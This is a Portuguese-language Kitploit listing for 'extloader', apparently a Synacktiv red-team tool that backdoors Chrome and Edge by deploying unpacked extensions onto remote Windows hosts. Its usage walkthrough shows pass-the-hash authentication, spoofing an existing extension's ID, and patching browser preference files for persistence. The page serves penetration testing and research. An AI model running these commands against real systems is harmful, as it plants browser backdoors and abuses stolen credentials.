Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
extloader — Um kit de exploração de extensões do Chromium | Kitploit
Ferramentas/GitHubGitHub/synacktiv/extloader
Mecanismos de PersistênciaExploraçãoExploração de Aplicações WebColeta de InformaçõesPós-ExploraçãoTestes de PenetraçãoRed Teaming
GitHubsynacktiv/extloader

extloader

Um kit de exploração de extensões do Chromium

Ver Repositório
26216há 0 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

extLoader

Um pequeno conjunto de ferramentas para gerenciar e implantar extensões Chromium não empacotadas.

Saiba mais no seguinte artigo de blog: https://www.synacktiv.com/en/publications/the-phantom-extension-backdooring-chrome-through-uncharted-pathways

Instalação

Instalação direta (pipx)

pipx install .
extloader --help

Use pipx para uma instalação isolada com Python 3.10+.

Configuração de desenvolvimento (uv)

uv venv
source .venv/bin/activate
uv pip install -e .

Opções de Autenticação

  • Senha: -p/--password
  • Hash: -H/--hash (formato LM:NT ou apenas NT)
  • Domínio: -d/--domain (o padrão é WORKGROUP)

Parâmetros Comuns

  • -t, --target: IP/hostname do alvo
  • -u, --username: Nome de usuário
  • -i, --index: Índice do usuário retornado pelo comando check
  • --debug: Ativa o registro de depuração

Uso

Aqui está um exemplo passo a passo de implantação de uma extensão:

  1. Primeiro, verifique os alvos disponíveis:
# This will list available users and browsers
extloader check -t 192.168.1.100 -u admin -H aad3b435b51404eeaad3b435b51404ee:ntlm_hash -d corp.local

┏━━━━━━━━┳━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ Index  ┃ Browser         ┃ User (SID)                                                   ┃
┡━━━━━━━━╇━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
│   1    │ Chrome          │ john.doe (S-1-5-21-4196007090-2879228606-3183820935-1122)    │
│   2    │ Microsoft Edge  │ john.doe (S-1-5-21-4196007090-2879228606-3183820935-1122)    │
└────────┴─────────────────┴──────────────────────────────────────────────────────────────┘

Ao executar o exploit em uma máquina diferente, sempre execute o comando check antes para atualizar o contexto (available_targets.json).

  1. Prepare o manifest (assine ou falsifique um ID):
# Create a deterministic crx_id by adding a key to the manifest.json
extloader sign --extension ./my-extension

Para falsificar um ID de extensão existente, pule o comando acima e defina a chave key do manifest como a chave pública base64 da extensão que você está imitando. Reutilizar essa chave mantém o ID CRX inalterado.

  1. Implante a extensão:
# Deploy to user index 1 (Chrome of john.doe)
extloader exploit -t 192.168.1.100 -u admin -H ntlm_hash -i 1 --extension ./my-extension

4.(Alternativa) Empacote para implantação manual:

# Bundle the signed extension with the captured Preferences file
extloader package --prefs-file "Preferences" --extension-dir ./my-extension --target-dir "C:\\Users\\Public"

# This creates a ZIP containing:
# - Signed extension files
# - Updated preferences files
# - Deployment instructions

--prefs-file espera as preferências do perfil do navegador que você salvou (Chrome/Edge as armazenam como Secure Preferences; outros navegadores Chromium usam Preferences). O loader copia o arquivo, aplica o patch e inclui tanto a versão modificada quanto a inalterada no pacote.

├── extension/
│   └── chrome-mv3/
├── preferences/
│   ├── brave/
│   ├── chrome/
│   ├── chromium/
    [...]
└── info.json
  1. Restaure as preferências originais, se necessário:
# Restore original preferences for user index 1 (need check command to get the correct context)
extloader restore -t 192.168.1.100 -u admin -H ntlm_hash -i 1 -f ./backup_preferences

TODO

  • Suporte a Kerberos
  • Módulo nxc
  • Adaptar o fluxo de trabalho do package para Linux
  • Adaptar o fluxo de trabalho do package para macOS
Baixar ferramenta